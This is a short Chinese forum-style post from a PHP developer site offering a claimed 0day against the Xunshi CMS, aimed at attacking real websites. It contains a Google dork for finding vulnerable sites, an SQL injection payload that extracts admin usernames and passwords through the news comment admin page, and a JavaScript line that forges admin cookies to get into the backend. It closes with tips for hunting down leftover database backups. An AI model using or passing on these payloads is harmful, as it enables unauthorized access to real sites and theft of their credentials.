热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

讯时系统通杀漏洞0day

利用cokiess欺骗进管理后台,google关键字inurl:news_more.asp?lm21.adminadmin_news_pl_view.asp?+dfirst([user],[admin])+chr(124)+dfirst([pass],[admin]),use

利用cokiess欺骗进管理后台,google关键字inurl:news_more.asp?lm2=

1.
/admin/admin_news_pl_view.asp?id=1

//id任意 填入以下语句
2. 有时1显示错误信息的时候继续往后退2,3,4。。。。

3. |'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='

4. Javascript:alert(document.COOKIE="adminuser=" + escape("admin"));alert(document.COOKIE="adminpass=" + escape("改这里"));

5 修改以上COOKIEs 欺骗进后台~

一般/login.asp 在admin的同级目录的时候可以用到,其他的讯时用以前的三板斧就行了,有个eweb可以列目录的~

后台有备份的 没备份的时候浏览器上试试文件 打开 直接写备份名,有的只是把备份名去掉了 文件还在的。。。


推荐阅读
author-avatar
夜冷
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有